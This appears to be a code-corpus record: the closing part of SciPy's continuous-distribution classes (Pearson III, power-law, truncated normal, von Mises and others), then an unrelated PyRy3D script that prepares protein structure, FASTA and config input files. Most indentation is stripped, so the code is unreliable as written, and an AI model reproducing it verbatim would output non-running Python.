    R.M. Vogel and D.E. McMartin, "Probability Plot Goodness-of-Fit and
Skewness Estimation Procedures for the Pearson Type 3 Distribution", Water
Resources Research, Vol.27, 3149-3158 (1991).
L.R. Salvosa, "Tables of Pearson's Type III Function", Ann. Math. Statist.,
Vol.1, 191-198 (1930).
"Using Modern Computing Tools to Fit the Pearson Type III Distribution to
Aviation Loads Data", Office of Aviation Research (2003).
"""
def _preprocess(self, x, skew):
# The real 'loc' and 'scale' are handled in the calling pdf(...). The
# local variables 'loc' and 'scale' within pearson3._pdf are set to
# the defaults just to keep them as part of the equations for
# documentation.
loc = 0.0
scale = 1.0
# If skew is small, return _norm_pdf. The divide between pearson3
# and norm was found by brute force and is approximately a skew of
# 0.000016. No one, I hope, would actually use a skew value even
# close to this small.
norm2pearson_transition = 0.000016
ans, x, skew = np.broadcast_arrays([1.0], x, skew)
ans = ans.copy()
mask = np.absolute(skew) < norm2pearson_transition
invmask = ~mask
beta = 2.0 / (skew[invmask] * scale)
alpha = (scale * beta)**2
zeta = loc - alpha / beta
transx = beta * (x[invmask] - zeta)
return ans, x, transx, skew, mask, invmask, beta, alpha, zeta
def _argcheck(self, skew):
# The _argcheck function in rv_continuous only allows positive
# arguments. The skew argument for pearson3 can be zero (which I want
# to handle inside pearson3._pdf) or negative. So just return True
# for all skew args.
return np.ones(np.shape(skew), dtype=bool)
def _stats(self, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess([1], skew))
m = zeta + alpha / beta
v = alpha / (beta**2)
s = 2.0 / (alpha**0.5) * np.sign(beta)
k = 6.0 / alpha
return m, v, s, k
def _pdf(self, x, skew):
        # Do the calculation in _logpdf since it helps to limit
        # overflow/underflow problems
ans = exp(self._logpdf(x, skew))
if ans.ndim == 0:
if np.isnan(ans):
return 0.0
return ans
ans[np.isnan(ans)] = 0.0
return ans
def _logpdf(self, x, skew):
# PEARSON3 logpdf GAMMA logpdf
# np.log(abs(beta))
# + (alpha - 1)*log(beta*(x - zeta)) + (a - 1)*log(x)
# - beta*(x - zeta) - x
# - gamln(alpha) - gamln(a)
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(x, skew))
ans[mask] = np.log(_norm_pdf(x[mask]))
ans[invmask] = log(abs(beta)) + gamma._logpdf(transx, alpha)
return ans
def _cdf(self, x, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(x, skew))
ans[mask] = _norm_cdf(x[mask])
ans[invmask] = gamma._cdf(transx, alpha)
return ans
def _rvs(self, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess([0], skew))
if mask[0]:
return self._random_state.standard_normal(self._size)
ans = self._random_state.standard_gamma(alpha, self._size)/beta + zeta
if ans.size == 1:
return ans[0]
return ans
def _ppf(self, q, skew):
ans, q, transq, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(q, skew))
ans[mask] = _norm_ppf(q[mask])
ans[invmask] = special.gammaincinv(alpha, q[invmask])/beta + zeta
return ans
pearson3 = pearson3_gen(name="pearson3")
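# Worked example (illustrative, not part of the original module): with the
# docstring's reparametrization at unit scale and zero loc, skew = 0.5 gives
# beta = 2/0.5 = 4, alpha = beta**2 = 16 and zeta = -alpha/beta = -4.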
class powerlaw_gen(rv_continuous):
"""A power-function continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlaw` is::
powerlaw.pdf(x, a) = a * x**(a-1)
for ``0 <= x <= 1``, ``a > 0``.
`powerlaw` is a special case of `beta` with ``b == 1``.
%(example)s
"""
def _pdf(self, x, a):
return a*x**(a-1.0)
def _logpdf(self, x, a):
return log(a) + special.xlogy(a - 1, x)
def _cdf(self, x, a):
return x**(a*1.0)
def _logcdf(self, x, a):
return a*log(x)
def _ppf(self, q, a):
return pow(q, 1.0/a)
def _stats(self, a):
return (a / (a + 1.0),
a / (a + 2.0) / (a + 1.0) ** 2,
-2.0 * ((a - 1.0) / (a + 3.0)) * sqrt((a + 2.0) / a),
6 * polyval([1, -1, -6, 2], a) / (a * (a + 3.0) * (a + 4)))
def _entropy(self, a):
return 1 - 1.0/a - log(a)
powerlaw = powerlaw_gen(a=0.0, b=1.0, name="powerlaw")
class powerlognorm_gen(rv_continuous):
"""A power log-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlognorm` is::
powerlognorm.pdf(x, c, s) = c / (x*s) * phi(log(x)/s) *
(Phi(-log(x)/s))**(c-1),
where ``phi`` is the normal pdf, and ``Phi`` is the normal cdf,
and ``x > 0``, ``s, c > 0``.
%(example)s
"""
def _pdf(self, x, c, s):
return (c/(x*s) * _norm_pdf(log(x)/s) *
pow(_norm_cdf(-log(x)/s), c*1.0-1.0))
def _cdf(self, x, c, s):
return 1.0 - pow(_norm_cdf(-log(x)/s), c*1.0)
def _ppf(self, q, c, s):
return exp(-s * _norm_ppf(pow(1.0 - q, 1.0 / c)))
powerlognorm = powerlognorm_gen(a=0.0, name="powerlognorm")
class powernorm_gen(rv_continuous):
"""A power normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powernorm` is::
powernorm.pdf(x, c) = c * phi(x) * (Phi(-x))**(c-1)
where ``phi`` is the normal pdf, and ``Phi`` is the normal cdf,
and ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return (c*_norm_pdf(x) * (_norm_cdf(-x)**(c-1.0)))
def _logpdf(self, x, c):
return log(c) + _norm_logpdf(x) + (c-1)*_norm_logcdf(-x)
def _cdf(self, x, c):
return 1.0-_norm_cdf(-x)**(c*1.0)
def _ppf(self, q, c):
return -_norm_ppf(pow(1.0 - q, 1.0 / c))
powernorm = powernorm_gen(name='powernorm')
class rdist_gen(rv_continuous):
"""An R-distributed continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rdist` is::
rdist.pdf(x, c) = (1-x**2)**(c/2-1) / B(1/2, c/2)
for ``-1 <= x <= 1``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return np.power((1.0 - x**2), c / 2.0 - 1) / special.beta(0.5, c / 2.0)
def _cdf(self, x, c):
term1 = x / special.beta(0.5, c / 2.0)
res = 0.5 + term1 * special.hyp2f1(0.5, 1 - c / 2.0, 1.5, x**2)
# There's an issue with hyp2f1, it returns nans near x = +-1, c > 100.
# Use the generic implementation in that case. See gh-1285 for
# background.
if any(np.isnan(res)):
return rv_continuous._cdf(self, x, c)
return res
def _munp(self, n, c):
numerator = (1 - (n % 2)) * special.beta((n + 1.0) / 2, c / 2.0)
return numerator / special.beta(1. / 2, c / 2.)
rdist = rdist_gen(a=-1.0, b=1.0, name="rdist")
class rayleigh_gen(rv_continuous):
"""A Rayleigh continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rayleigh` is::
rayleigh.pdf(r) = r * exp(-r**2/2)
for ``x >= 0``.
`rayleigh` is a special case of `chi` with ``df == 2``.
%(example)s
"""
def _rvs(self):
return chi.rvs(2, size=self._size, random_state=self._random_state)
def _pdf(self, r):
return r * exp(-0.5 * r**2)
def _cdf(self, r):
return 1 - exp(-0.5 * r**2)
def _ppf(self, q):
return sqrt(-2 * log(1 - q))
def _stats(self):
val = 4 - pi
return (np.sqrt(pi/2), val/2, 2*(pi-3)*sqrt(pi)/val**1.5,
6*pi/val-16/val**2)
def _entropy(self):
return _EULER/2.0 + 1 - 0.5*log(2)
rayleigh = rayleigh_gen(a=0.0, name="rayleigh")
class reciprocal_gen(rv_continuous):
"""A reciprocal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `reciprocal` is::
reciprocal.pdf(x, a, b) = 1 / (x*log(b/a))
for ``a <= x <= b``, ``a, b > 0``.
%(example)s
"""
def _argcheck(self, a, b):
self.a = a
self.b = b
self.d = log(b*1.0 / a)
return (a > 0) & (b > 0) & (b > a)
def _pdf(self, x, a, b):
return 1.0 / (x * self.d)
def _logpdf(self, x, a, b):
return -log(x) - log(self.d)
def _cdf(self, x, a, b):
return (log(x)-log(a)) / self.d
def _ppf(self, q, a, b):
return a*pow(b*1.0/a, q)
def _munp(self, n, a, b):
return 1.0/self.d / n * (pow(b*1.0, n) - pow(a*1.0, n))
def _entropy(self, a, b):
return 0.5*log(a*b)+log(log(b/a))
reciprocal = reciprocal_gen(name="reciprocal")
# FIXME: PPF does not work.
class rice_gen(rv_continuous):
"""A Rice continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rice` is::
rice.pdf(x, b) = x * exp(-(x**2+b**2)/2) * I[0](x*b)
for ``x > 0``, ``b > 0``.
%(example)s
"""
def _argcheck(self, b):
return b >= 0
def _rvs(self, b):
# http://en.wikipedia.org/wiki/Rice_distribution
sz = self._size if self._size else 1
t = b/np.sqrt(2) + self._random_state.standard_normal(size=(2, sz))
return np.sqrt((t*t).sum(axis=0))
def _pdf(self, x, b):
return x * exp(-(x-b)*(x-b)/2.0) * special.i0e(x*b)
def _munp(self, n, b):
nd2 = n/2.0
n1 = 1 + nd2
b2 = b*b/2.0
return (2.0**(nd2) * exp(-b2) * special.gamma(n1) *
special.hyp1f1(n1, 1, b2))
rice = rice_gen(a=0.0, name="rice")
# FIXME: PPF does not work.
class recipinvgauss_gen(rv_continuous):
"""A reciprocal inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `recipinvgauss` is::
recipinvgauss.pdf(x, mu) = 1/sqrt(2*pi*x) * exp(-(1-mu*x)**2/(2*x*mu**2))
for ``x >= 0``.
%(example)s
"""
def _rvs(self, mu):
return 1.0/self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
return 1.0/sqrt(2*pi*x)*exp(-(1-mu*x)**2.0 / (2*x*mu**2.0))
def _logpdf(self, x, mu):
return -(1-mu*x)**2.0 / (2*x*mu**2.0) - 0.5*log(2*pi*x)
def _cdf(self, x, mu):
trm1 = 1.0/mu - x
trm2 = 1.0/mu + x
isqx = 1.0/sqrt(x)
return 1.0-_norm_cdf(isqx*trm1)-exp(2.0/mu)*_norm_cdf(-isqx*trm2)
recipinvgauss = recipinvgauss_gen(a=0.0, name='recipinvgauss')
class semicircular_gen(rv_continuous):
"""A semicircular continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `semicircular` is::
semicircular.pdf(x) = 2/pi * sqrt(1-x**2)
for ``-1 <= x <= 1``.
%(example)s
"""
def _pdf(self, x):
return 2.0/pi*sqrt(1-x*x)
def _cdf(self, x):
return 0.5+1.0/pi*(x*sqrt(1-x*x) + arcsin(x))
def _stats(self):
return 0, 0.25, 0, -1.0
def _entropy(self):
return 0.64472988584940017414
semicircular = semicircular_gen(a=-1.0, b=1.0, name="semicircular")
class triang_gen(rv_continuous):
"""A triangular continuous random variable.
%(before_notes)s
Notes
-----
    The triangular distribution can be represented with an up-sloping line
    from ``loc`` to ``(loc + c*scale)`` and then a down-sloping line from
    ``(loc + c*scale)`` to ``(loc + scale)``.
The standard form is in the range [0, 1] with c the mode.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _rvs(self, c):
return self._random_state.triangular(0, c, 1, self._size)
def _argcheck(self, c):
return (c >= 0) & (c <= 1)
def _pdf(self, x, c):
return where(x < c, 2*x/c, 2*(1-x)/(1-c))
def _cdf(self, x, c):
return where(x < c, x*x/c, (x*x-2*x+c)/(c-1))
def _ppf(self, q, c):
return where(q < c, sqrt(c*q), 1-sqrt((1-c)*(1-q)))
def _stats(self, c):
return (c+1.0)/3.0, (1.0-c+c*c)/18, sqrt(2)*(2*c-1)*(c+1)*(c-2) / \
(5 * np.power((1.0-c+c*c), 1.5)), -3.0/5.0
def _entropy(self, c):
return 0.5-log(2)
triang = triang_gen(a=0.0, b=1.0, name="triang")
class truncexpon_gen(rv_continuous):
"""A truncated exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `truncexpon` is::
truncexpon.pdf(x, b) = exp(-x) / (1-exp(-b))
for ``0 < x < b``.
%(example)s
"""
def _argcheck(self, b):
self.b = b
return (b > 0)
def _pdf(self, x, b):
return exp(-x)/(1-exp(-b))
def _logpdf(self, x, b):
return -x - log(1-exp(-b))
def _cdf(self, x, b):
return (1.0-exp(-x))/(1-exp(-b))
def _ppf(self, q, b):
return -log(1-q+q*exp(-b))
def _munp(self, n, b):
# wrong answer with formula, same as in continuous.pdf
# return gam(n+1)-special.gammainc(1+n, b)
if n == 1:
return (1-(b+1)*exp(-b))/(-special.expm1(-b))
elif n == 2:
return 2*(1-0.5*(b*b+2*b+2)*exp(-b))/(-special.expm1(-b))
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n, b)
def _entropy(self, b):
eB = exp(b)
return log(eB-1)+(1+eB*(b-1.0))/(1.0-eB)
truncexpon = truncexpon_gen(a=0.0, name='truncexpon')
class truncnorm_gen(rv_continuous):
"""A truncated normal continuous random variable.
%(before_notes)s
Notes
-----
The standard form of this distribution is a standard normal truncated to
the range [a, b] --- notice that a and b are defined over the domain of the
standard normal. To convert clip values for a specific mean and standard
deviation, use::
a, b = (myclip_a - my_mean) / my_std, (myclip_b - my_mean) / my_std
%(example)s
"""
def _argcheck(self, a, b):
self.a = a
self.b = b
self._nb = _norm_cdf(b)
self._na = _norm_cdf(a)
self._sb = _norm_sf(b)
self._sa = _norm_sf(a)
if self.a > 0:
self._delta = -(self._sb - self._sa)
else:
self._delta = self._nb - self._na
self._logdelta = log(self._delta)
return (a != b)
def _pdf(self, x, a, b):
return _norm_pdf(x) / self._delta
def _logpdf(self, x, a, b):
return _norm_logpdf(x) - self._logdelta
def _cdf(self, x, a, b):
return (_norm_cdf(x) - self._na) / self._delta
def _ppf(self, q, a, b):
if self.a > 0:
return _norm_isf(q*self._sb + self._sa*(1.0-q))
else:
return _norm_ppf(q*self._nb + self._na*(1.0-q))
def _stats(self, a, b):
nA, nB = self._na, self._nb
d = nB - nA
pA, pB = _norm_pdf(a), _norm_pdf(b)
mu = (pA - pB) / d # correction sign
mu2 = 1 + (a*pA - b*pB) / d - mu*mu
return mu, mu2, None, None
truncnorm = truncnorm_gen(name='truncnorm')
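# Illustrative sketch (not part of the original module): standardizing clip
# values as described in the docstring above; the numbers are hypothetical.
#
#     >>> my_mean, my_std = 0.5, 2.0                                 # doctest: +SKIP
#     >>> a, b = (0.0 - my_mean) / my_std, (1.0 - my_mean) / my_std  # doctest: +SKIP
#     >>> truncnorm.pdf(0.5, a, b, loc=my_mean, scale=my_std)        # doctest: +SKIP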
# FIXME: RVS does not work.
class tukeylambda_gen(rv_continuous):
    """A Tukey-Lambda continuous random variable.
%(before_notes)s
Notes
-----
A flexible distribution, able to represent and interpolate between the
following distributions:
- Cauchy (lam=-1)
- logistic (lam=0.0)
- approx Normal (lam=0.14)
- u-shape (lam = 0.5)
- uniform from -1 to 1 (lam = 1)
%(example)s
"""
def _argcheck(self, lam):
return np.ones(np.shape(lam), dtype=bool)
def _pdf(self, x, lam):
Fx = asarray(special.tklmbda(x, lam))
Px = Fx**(lam-1.0) + (asarray(1-Fx))**(lam-1.0)
Px = 1.0/asarray(Px)
return where((lam <= 0) | (abs(x) < 1.0/asarray(lam)), Px, 0.0)
def _cdf(self, x, lam):
return special.tklmbda(x, lam)
def _ppf(self, q, lam):
q = q*1.0
vals1 = (q**lam - (1-q)**lam)/lam
vals2 = log(q/(1-q))
return where((lam == 0) & (q == q), vals2, vals1)
def _stats(self, lam):
return 0, _tlvar(lam), 0, _tlkurt(lam)
def _entropy(self, lam):
def integ(p):
return log(pow(p, lam-1)+pow(1-p, lam-1))
return integrate.quad(integ, 0, 1)[0]
tukeylambda = tukeylambda_gen(name='tukeylambda')
class uniform_gen(rv_continuous):
"""A uniform continuous random variable.
This distribution is constant between `loc` and ``loc + scale``.
%(before_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.uniform(0.0, 1.0, self._size)
def _pdf(self, x):
return 1.0*(x == x)
def _cdf(self, x):
return x
def _ppf(self, q):
return q
def _stats(self):
return 0.5, 1.0/12, 0, -1.2
def _entropy(self):
return 0.0
uniform = uniform_gen(a=0.0, b=1.0, name='uniform')
class vonmises_gen(rv_continuous):
"""A Von Mises continuous random variable.
%(before_notes)s
Notes
-----
    If `x` or `loc` is outside the range, they are treated as angles and
    wrapped to their [-pi, pi] equivalents.
The probability density function for `vonmises` is::
vonmises.pdf(x, kappa) = exp(kappa * cos(x)) / (2*pi*I[0](kappa))
for ``-pi <= x <= pi``, ``kappa > 0``.
See Also
--------
vonmises_line : The same distribution, defined on a [-pi, pi] segment
of the real line.
%(example)s
"""
def _rvs(self, kappa):
return self._random_state.vonmises(0.0, kappa, size=self._size)
def _pdf(self, x, kappa):
return exp(kappa * cos(x)) / (2*pi*special.i0(kappa))
def _cdf(self, x, kappa):
return vonmises_cython.von_mises_cdf(kappa, x)
def _stats_skip(self, kappa):
return 0, None, 0, None
vonmises = vonmises_gen(name='vonmises')
vonmises_line = vonmises_gen(a=-np.pi, b=np.pi, name='vonmises_line')
class wald_gen(invgauss_gen):
"""A Wald continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wald` is::
wald.pdf(x) = 1/sqrt(2*pi*x**3) * exp(-(x-1)**2/(2*x))
for ``x > 0``.
`wald` is a special case of `invgauss` with ``mu == 1``.
%(example)s
"""
def _rvs(self):
return self._random_state.wald(1.0, 1.0, size=self._size)
def _pdf(self, x):
return invgauss._pdf(x, 1.0)
def _logpdf(self, x):
return invgauss._logpdf(x, 1.0)
def _cdf(self, x):
return invgauss._cdf(x, 1.0)
def _stats(self):
return 1.0, 1.0, 3.0, 15.0
wald = wald_gen(a=0.0, name="wald")
class wrapcauchy_gen(rv_continuous):
"""A wrapped Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wrapcauchy` is::
wrapcauchy.pdf(x, c) = (1-c**2) / (2*pi*(1+c**2-2*c*cos(x)))
for ``0 <= x <= 2*pi``, ``0 < c < 1``.
%(example)s
"""
def _argcheck(self, c):
return (c > 0) & (c < 1)
def _pdf(self, x, c):
return (1.0-c*c)/(2*pi*(1+c*c-2*c*cos(x)))
def _cdf(self, x, c):
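        # The two branches below evaluate the CDF via the half-angle tangent
        # substitution (arctan of val*tan(x/2)), split at x = pi.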
output = 0.0*x
val = (1.0+c)/(1.0-c)
c1 = x < pi
c2 = 1-c1
xp = extract(c1, x)
xn = extract(c2, x)
if (any(xn)):
valn = extract(c2, np.ones_like(x)*val)
xn = 2*pi - xn
yn = tan(xn/2.0)
on = 1.0-1.0/pi*arctan(valn*yn)
place(output, c2, on)
if (any(xp)):
valp = extract(c1, np.ones_like(x)*val)
yp = tan(xp/2.0)
op = 1.0/pi*arctan(valp*yp)
place(output, c1, op)
return output
def _ppf(self, q, c):
val = (1.0-c)/(1.0+c)
rcq = 2*arctan(val*tan(pi*q))
rcmq = 2*pi-2*arctan(val*tan(pi*(1-q)))
return where(q < 1.0/2, rcq, rcmq)
def _entropy(self, c):
return log(2*pi*(1-c*c))
wrapcauchy = wrapcauchy_gen(a=0.0, b=2*pi, name='wrapcauchy')
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_continuous)
__all__ = _distn_names + _distn_gen_names
|
jsilter/scipy
|
scipy/stats/_continuous_distns.py
|
Python
|
bsd-3-clause
| 106,977
|
[
"Gaussian"
] |
7fba641b6a570b962849d69726bc977972117b02faf7c8cc0e2ad6963cfa47d7
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# www.genesilico.pl
#
#creates ranked 3D models of macromolecular complexes
#based on experimental restraints and a whole complex shape.
__author__ = "Joanna M. Kasprzak"
__copyright__ = "Copyright 2010, The PyRy3D Project"
__credits__ = ["Janusz Bujnicki"]
__license__ = "GPL"
__version__ = "0.1.0"
__maintainer__ = "Joanna Kasprzak"
__email__ = "jkasp@amu.edu.pl"
__status__ = "Prototype"
import sys, os, glob, tarfile
from shutil import rmtree
#Internal imports
#BioPython
from Bio import PDB
from Bio.PDB import PDBParser, PDBIO
from Bio.PDB.Atom import Atom
from Bio.PDB.Residue import Residue
from Bio.PDB.Chain import Chain
from Bio.PDB.Model import Model
from Bio.PDB.Structure import Structure
import tkMessageBox
#from Pyry_cleanPDB import run_cleanPDB
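#NOTE on the RESNAMES mapping below: MSE (selenomethionine) maps to "M" like
#MET, and the nucleotide entries (CYT, THY, GUA, ADE, URA) map to their
#one-letter base codes.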
RESNAMES = {"ALA": "A", "ARG": "R", "ASP": "D", "ASN": "N", "CYS": "C",\
"GLU": "E", "GLY": "G", "GLN": "Q", "HIS": "H", \
"ILE": "I", "LEU": "L", "LYS": "K", "MET": "M", "MSE": "M",\
"PHE": "F", "PRO": "P", "SER": "S", "THR": "T",\
"TRP": "W", "TYR": "Y", "VAL": "V", \
"CYT": "C", "THY": "T", "GUA": "G", "ADE": "A", "URA": "U"}
"""
This module is created to enable PyRy3D users to create input files automatically
1. it takes a folder with structures
2. it renames chains, renumbers residues and removes HETATM records
3. it creates a tarred archive with structures in PyRy3D format
4. it automatically creates a fasta file with structure sequences
5. it automatically creates a config file with simulation parameters set to default values
The module will become:
1. a part of PyRy3D program
2. a part of PyRy3D Chimera plugin
Future:
1. features enabling users to decide on parameters for config file
2. features enabling users to decide on numeration/chain_names for structures
"""
class PyRy3D_IG_Error(Exception): pass
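#Typical usage (a sketch mirroring the __main__ block at the bottom of this
#file; the folder and file names here are hypothetical):
#    instr = InStructures()
#    instr.generate_pyry_instructures("my_pdbs", "my_outdir")
#    InSequences().generate_pyry_insequences("complex.fasta", instr.structures)
#    InConfig().generate_pyry_inconfig("config.txt")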
class PyRy3D_InputGenerator(object):
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_infiles(self):
pass
def print_run_command(self):
pass
class InStructure(object):
def __init__(self, biostruct, filename):
self.biostruct = biostruct
self.filename = filename
class InStructures(object):
"""
stores information and methods to create default PyRy3D structure folder
"""
def __init__(self):
self.structures = [] #list of Bio.PDB structures provided by the user
self.taken_chains = [] #list of chain names already assigned
self.alphabet = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","W","X","Y","Z",\
"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","w","x","y","z",\
"1","2","3","4","5","6","7","8","9","0","-","+","_","=","~","`","!","@","#","$","%","^","&","*","(",\
")","{","}","[","]","|"]
#here add other chars and digits
self.outname = "" #outfolder name
def __str__(self):
pass
    def generate_pyry_instructures(self, input_folder, output_folder, rankname = ""):
        """
        extracts structures from input_folder, prepares them (cleaning,
        chain renaming) and archives them in output_folder
        """
self.extract_structures(input_folder)
self.create_outfolder(output_folder)
self.prepare_instructures()
self.archive_structures(rankname)
    def prepare_instructures(self):
        """
        cleans each structure, assigns a unique chain name to every chain
        and writes the modified structures to the output folder
        """
for struc in self.structures:
chain_name = ""
for model in struc.biostruct:
for chain in model:
chain_name += chain.id
self.clean_structures(chain)
if (chain_name in self.taken_chains) or (chain_name == ""):
self.rename_chains(chain, self.alphabet[0])
self.taken_chains.append(self.alphabet[0])
self.alphabet.pop(0)
elif (chain_name not in self.taken_chains):
self.taken_chains.append(chain_name)
if chain_name in self.alphabet:
self.alphabet.remove(chain_name)
self.write_pdb(struc.biostruct, self.outname+"/"+str(struc.filename))
def create_outfolder(self, outname):
"""
creates outfolder with prepared structures' files
"""
#if os.path.exists(str(outname)) == True:
# rmtree(str(outname))
self.outname = outname
#os.mkdir(str(outname))
def extract_structures(self, infolder):
"""
        takes all pdb files from infolder and stores them in the self.structures list of objects
"""
#os.system("python cleanPDB.py -q -d "+str(infolder))
#run_cleanPDB(str(filename), self.shape_file)
pdb_files = glob.glob(str(infolder)+'/*.pdb')
#if len(pdb_files) == 0: raise PyRy3D_IG_Error("The files you provided are not pdb files")
for pdbfile in pdb_files:
parser = PDBParser()
structure = parser.get_structure(str(pdbfile), pdbfile)
pdbfile=pdbfile.replace("\\","/")
#print "POREPLACE", pdbfile
filename = pdbfile.split("/")[-1]
#print "DALEJ", filename
struc = InStructure(structure,filename)
if len(list(structure.get_residues())) == 0:
raise PyRy3D_IG_Error("The file you provided for structure %s is not a valid pdb file"%(structure.id))
self.structures.append(struc)
def clean_structures(self, chain):
"""
remove hetatms, ions, ligands etc which are not parsed by Bio.PDB
"""
print "Cleaning", chain.id
for resi in chain:
if resi.id[0] != ' ':
#print "!!!!!!!!", chain.id, resi.id, resi.resname
#if resi.resname == "MSE":
# resi.resname = "MET"
#resi.id[0] = " "
#else:
#print "DETACH", resi.id, resi.resname, chain.id
chain.detach_child(resi.id)
def rename_chains(self, chain, chain_name):
"""
renames chains in structures, as a result each structure has
a different chain name (A, B,......, Z)
"""
#what if more than 24 chains?
chain.id = chain_name
def renumber_residues(self, chain):
"""
renumbers residues from 1 to ...
"""
i = 1
for resi in chain:
resi.id = (' ', i, ' ')
i += 1
#def renumber_residues_start_stop(struct, start_id, stop_id, ren_type = None):
# """
# method for renumbering residues according to user defined order
# """
# i = start_id
# for model in struct:
# for chain in model:
# chain.id = 'P'
# for residue in chain:
# if ren_type != None:
# if residue.id[2] != ' ':
# residue.id = (' ', i, ' ')
# i += 1
# elif i <= stop_id:
# residue.id = (' ', i, ' ')
# i += 1
# return struct
def write_pdb(self, structure, filename):
"""
        Writing to the pdb_file, saving changed coordinates
"""
fp=open(filename, "w")
io=PDBIO(1)
io.set_structure(structure)
io.save(fp)
def archive_structures(self,rankname):
"""
creates tar archive with structures - final input for PyRy3D
"""
if rankname != "":
#rankname = "input"
tar = tarfile.open(self.outname+"/packs/"+rankname+".tar", "w:")
tarname=rankname
tar.add(self.outname,arcname=tarname,recursive=False)
files = glob.glob(self.outname+"/*.pdb")
for f in files:
fn = f.split("/")[-1]
tar.add(f,arcname=tarname+"/"+fn)
tar.close()
else:
rankname = "input"
tar = tarfile.open(self.outname+"/"+rankname+".tar", "w:")
#tarname=self.outname.split("/")[-1]
tarname=rankname
tar.add(self.outname,arcname=tarname)
tar.close()
class InSequences(object):
"""
stores information and methods to create default PyRy3D mfasta file
"""
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_insequences(self, fastafile, structures):
"""
create multi fasta file in format:
>A
seq_A
>B
seq_B
Parameters:
-------------
fastafile : output fasta file name
structures : list of all structures as Bio.PDB objects
"""
self.create_fasta_file(fastafile)
self.get_sequences(structures)
def create_fasta_file(self, filename):
if os.path.exists(str(filename)) == True:
os.remove(str(filename))
fh = open(filename, "a")
self.fasta_file = fh
def get_sequences(self, structures):
"""
retrieves struct sequence as one letter code
Parameters:
-----------
structures: all structures from infolder as a list of Bio.PDB objects
"""
for struct in structures:
sequence, chains_names = "", []
for ch in struct.biostruct.get_chains():
chains_names.append(ch.id)
for resi in struct.biostruct.get_residues():
resi_name = ''
resi_name += resi.resname.strip()
#for 3letter residue names like "ALA"
if len(resi_name) == 3:
resi_name = self.get_1letter_resname(resi_name, struct.biostruct, ch)
resi.resname = resi_name
#for dna names like "DC"
elif len(resi_name) == 2:
resi_name = resi_name[1]
resi.resname = resi_name
sequence += resi_name
self.add_sequence(sequence, chains_names)
self.fasta_file.close()
def add_sequence(self, sequence, chains):
"""
adds sequence to fasta file
"""
chains_ids = ";".join(chains)
self.fasta_file.write(">"+str(chains_ids)+"\n")
self.fasta_file.write(sequence+"\n")
def get_1letter_resname(self, resname, struct, chain):
"""
returns 1letter code of given residue eg. A for ALA
Parameters:
-----------
resname : residue name in any notation eg ALA, URI or A, U
struct : structure for which the function works at the moment
        Returns:
        ---------
        resname in 1letter notation e.g. A, U; an empty string
        if the residue name is not recognized
"""
if resname in RESNAMES.keys() : return RESNAMES[resname]
else:
#print "There is no residue %s %s"%(resname, chain.id)
return ""
class InConfig(object):
"""
    stores information and methods to create default PyRy3D config file
"""
def __init__(self):
pass
def __str__(self):
pass
def generate_pyry_inconfig(self, filename):
"""
        generates a config file with all values set to defaults
"""
self.create_config_file(str(filename))
self.add_default_data()
    def create_config_file(self, conffile):
        """
        creates (or overwrites) the config file and opens it for appending
        """
if os.path.exists(str(conffile)) == True:
os.remove(str(conffile))
self.confile = open(conffile, "a")
    def add_default_data(self):
        """
        writes the default simulation parameters into the config file
        """
content = """
SIMMETHOD x #genetic or sa for simulated annealing (default)
#REDUCTMETHOD roulette #Roulette,Tournament,Cutoff
ANNTEMP 10 #from range X to Y
STEPS 10 #default 100; how many simulation steps to perform?; maximum 1000
MAP_OUT 1 #default 1; can be in range from 0 to 10
BOX_OUT 1 #default 1; can be in range from 0 to 10
MAP_FREE_SPACE 1 #default 1; can be in range from 0 to 10
COLLISION 1 #default 1.5; can be in range from 0 to 10
RESTRAINTS 1 #default 1.3; can be in range from 0 to 10
MAXROT 10 #default is 5
MAXTRANS 10 10 10 #default is [5, 5, 5]
KVOL 1 #kvol default is 10, max is 50; how many complex volumes will describe density map
#THRESHOLD 1.6 #float value existing in map file, default is 0
SIMBOX 1.2 #default simulation box diameter
GRIDRADIUS 1.0 #default is 1.0
GRIDTYPE X
PARAMSCALINGRANGES 0 25 50 #default 0 25 50; at what point of simulation should parameter scaling ranges kick in
PARAMSCALINGR1 50 100 #default 50 100
PARAMSCALINGR2 25 50 #default 25 50
PARAMSCALINGR3 0 25 #default 0 25
WRITE_N_ITER 1 # default 1, minimum 1 max=STRUCT_NR
#OUT_STEPS FIRST LAST #default one struct with best score; which steps in output data?
        STRUCT_NR 1 #default 0.1SIMUL_NR; number of out structures with best scores
"""
self.confile.write(content)
self.confile.close()
def add_user_defined_data(self):
"""
method takes params from the user (from command line) and adds to config file
"""
pass
if __name__=='__main__':
doc = """
PyRy3D_Input_Generator
easy generator of input files for PyRy3D program
(c) 2010 by Joanna M. Kasprzak
usage: python pyry3d.py
"""
